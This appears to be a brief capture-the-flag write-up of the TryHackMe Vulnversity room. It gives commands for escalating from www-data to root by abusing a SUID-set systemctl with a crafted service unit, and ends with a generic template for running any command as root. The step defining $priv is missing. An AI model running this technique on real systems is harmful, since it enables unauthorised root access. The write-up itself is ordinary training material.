epikoeni

THM Vulnversity - Privilege Escalation

Angel H's photo
Angel H
·

1 min read

We found a vulnerable web server and uploaded a PHP reverse shell, and activated it.

We end up as the user www-data.

  • To privilege escalate, we use Python to get an interactive shell:
    python -c 'import pty;pty.spawn("/bin/bash")'

  • We know that /bin/systemctl is vulnerable due to having the SUID bit set. So we need to create a system variable to make a .system file to run with root access.

  • Execute the following code:

    echo '[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /opt/flag"
[Install]
WantedBy=multi-user.target' > $priv

  • Then we need to link it

    /bin/systemctl link $priv

  • And run it

    /bin/systemctl enable --now $priv

In the future, use this systemctl SUID exploit to do whatever you need root to do by changing the string after -c

echo '[Service]
ExecStart=/bin/bash -c "YOUR COMMAND AS ROOT GOES HERE"
[Install]
WantedBy=multi-user.target' > $priv
hacking#cybersecurity